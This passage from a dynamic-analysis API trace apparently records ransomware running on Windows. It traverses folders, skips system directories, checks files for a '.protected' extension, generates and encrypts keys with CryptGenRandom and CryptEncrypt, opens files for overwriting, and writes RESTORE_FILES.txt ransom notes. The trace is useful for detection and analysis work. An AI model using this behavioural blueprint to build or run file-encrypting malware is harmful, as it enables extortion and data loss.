lpString2="Program Files (x86)") returned -1 [0093.231] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.231] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\.") returned 43 [0093.231] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.231] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.232] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.232] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.232] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.232] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.232] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.232] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\..") returned 44 [0093.232] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.232] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.232] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.232] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.232] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.232] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.232] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.232] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.232] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\RESTORE_FILES.txt") returned 59 [0093.232] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.232] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.232] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.232] lstrcmpiW (lpString1="sql2950.tmp", lpString2="Windows") returned -1 [0093.232] lstrcmpiW (lpString1="sql2950.tmp", lpString2="Program Files") returned 1 [0093.232] lstrcmpiW (lpString1="sql2950.tmp", lpString2="Program Files (x86)") returned 1 [0093.232] lstrcmpiW (lpString1="sql2950.tmp", lpString2="$Recycle.bin") returned 1 [0093.232] lstrcmpiW (lpString1="sql2950.tmp", lpString2="System Volume Information") returned -1 [0093.232] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2950.tmp") returned 53 [0093.232] StrStrIW (lpFirst="sql2950.tmp", lpSrch=".protected") returned 0x0 [0093.232] lstrcmpW (lpString1="sql2950.tmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.232] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.232] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2950.tmp" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql2950.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.232] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.232] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="Windows") returned -1 [0093.232] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="Program Files") returned 1 [0093.232] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="Program Files (x86)") returned 1 [0093.232] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="$Recycle.bin") returned 1 [0093.232] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="System Volume Information") returned -1 [0093.233] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2A2C.tmp") returned 53 [0093.233] StrStrIW (lpFirst="sql2A2C.tmp", lpSrch=".protected") returned 0x0 [0093.233] lstrcmpW (lpString1="sql2A2C.tmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.233] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.233] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2A2C.tmp" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql2a2c.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.233] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.233] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.233] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\RESTORE_FILES.txt") returned 59 [0093.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.234] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.234] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.234] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\RESTORE_FILES.txt") returned 54 [0093.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.234] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.234] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.234] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.234] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.234] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.235] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.235] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RESTORE_FILES.txt") returned 50 [0093.235] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.235] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.235] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.235] lstrcmpiW (lpString1="Search", lpString2="Windows") returned -1 [0093.235] lstrcmpiW (lpString1="Search", lpString2="Program Files") returned 1 [0093.235] lstrcmpiW (lpString1="Search", lpString2="Program Files (x86)") returned 1 [0093.235] lstrcmpiW (lpString1="Search", lpString2="$Recycle.bin") returned 1 [0093.235] lstrcmpiW (lpString1="Search", lpString2="System Volume Information") returned -1 [0093.235] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search") returned 39 [0093.235] lstrcmpW (lpString1="Search", lpString2=".") returned 1 [0093.235] lstrcmpW (lpString1="Search", lpString2="..") returned 1 [0093.235] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*") returned 41 [0093.235] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.235] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.235] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.235] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.235] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.235] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.235] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\.") returned 41 [0093.235] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.235] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.235] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.235] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.235] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.235] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.235] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.235] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\..") returned 42 [0093.235] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.235] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.235] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.235] lstrcmpiW (lpString1="Data", lpString2="Windows") returned -1 [0093.236] lstrcmpiW (lpString1="Data", lpString2="Program Files") returned -1 [0093.236] lstrcmpiW (lpString1="Data", lpString2="Program Files (x86)") returned -1 [0093.236] lstrcmpiW (lpString1="Data", lpString2="$Recycle.bin") returned 1 [0093.236] lstrcmpiW (lpString1="Data", lpString2="System Volume Information") returned -1 [0093.236] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data") returned 44 [0093.236] lstrcmpW (lpString1="Data", lpString2=".") returned 1 [0093.236] lstrcmpW (lpString1="Data", lpString2="..") returned 1 [0093.236] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*") returned 46 [0093.236] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.236] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.236] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.236] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.236] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.236] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.236] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\.") returned 46 [0093.236] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.236] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.237] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.237] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.237] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.237] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.237] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.237] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\..") returned 47 [0093.237] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.237] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.237] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.237] lstrcmpiW (lpString1="Applications", lpString2="Windows") returned -1 [0093.237] lstrcmpiW (lpString1="Applications", lpString2="Program Files") returned -1 [0093.237] lstrcmpiW (lpString1="Applications", lpString2="Program Files (x86)") returned -1 [0093.237] lstrcmpiW (lpString1="Applications", lpString2="$Recycle.bin") returned 1 [0093.237] lstrcmpiW (lpString1="Applications", lpString2="System Volume Information") returned -1 [0093.237] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned 57 [0093.237] lstrcmpW (lpString1="Applications", lpString2=".") returned 1 [0093.237] lstrcmpW (lpString1="Applications", lpString2="..") returned 1 [0093.237] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*") returned 59 [0093.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.237] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.237] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.237] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.237] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.237] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.237] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\.") returned 59 [0093.237] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.237] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.237] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.237] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.237] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.237] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.237] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.237] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\..") returned 60 [0093.237] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.237] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.238] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.238] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\RESTORE_FILES.txt") returned 75 [0093.238] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.238] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.238] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.238] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0093.238] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.238] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.238] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\RESTORE_FILES.txt") returned 75 [0093.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.238] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.238] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\RESTORE_FILES.txt") returned 62 [0093.238] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.238] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.238] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.238] lstrcmpiW (lpString1="Temp", lpString2="Windows") returned -1 [0093.238] lstrcmpiW (lpString1="Temp", lpString2="Program Files") returned 1 [0093.238] lstrcmpiW (lpString1="Temp", lpString2="Program Files (x86)") returned 1 [0093.238] lstrcmpiW (lpString1="Temp", lpString2="$Recycle.bin") returned 1 [0093.238] lstrcmpiW (lpString1="Temp", lpString2="System Volume Information") returned 1 [0093.238] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp") returned 49 [0093.238] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0093.238] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0093.238] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*") returned 51 [0093.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.238] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.238] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.238] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.238] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.239] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.239] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\.") returned 51 [0093.239] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.239] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.239] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.239] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.239] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.239] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.239] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.239] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\..") returned 52 [0093.239] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.239] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.239] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.239] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.239] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.239] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.239] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.239] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.239] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\RESTORE_FILES.txt") returned 67 [0093.239] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.239] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.239] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.239] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.239] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\RESTORE_FILES.txt") returned 67 [0093.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\temp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.239] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.239] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.240] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\RESTORE_FILES.txt") returned 62 [0093.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.240] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.240] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.240] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.240] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.240] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.240] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.240] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\RESTORE_FILES.txt") returned 57 [0093.240] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.240] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.240] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.240] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.240] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\RESTORE_FILES.txt") returned 57 [0093.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.241] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.241] lstrcmpiW (lpString1="User Account Pictures", lpString2="Windows") returned -1 [0093.241] lstrcmpiW (lpString1="User Account Pictures", lpString2="Program Files") returned 1 [0093.241] lstrcmpiW (lpString1="User Account Pictures", lpString2="Program Files (x86)") returned 1 [0093.241] lstrcmpiW (lpString1="User Account Pictures", lpString2="$Recycle.bin") returned 1 [0093.241] lstrcmpiW (lpString1="User Account Pictures", lpString2="System Volume Information") returned 1 [0093.241] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures") returned 54 [0093.241] lstrcmpW (lpString1="User Account Pictures", lpString2=".") returned 1 [0093.241] lstrcmpW (lpString1="User Account Pictures", lpString2="..") returned 1 [0093.241] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*") returned 56 [0093.242] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.242] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.242] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.242] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.242] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.242] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.242] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\.") returned 56 [0093.242] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.242] FindNextFileW (in: hFindFile=0x47b9d0, 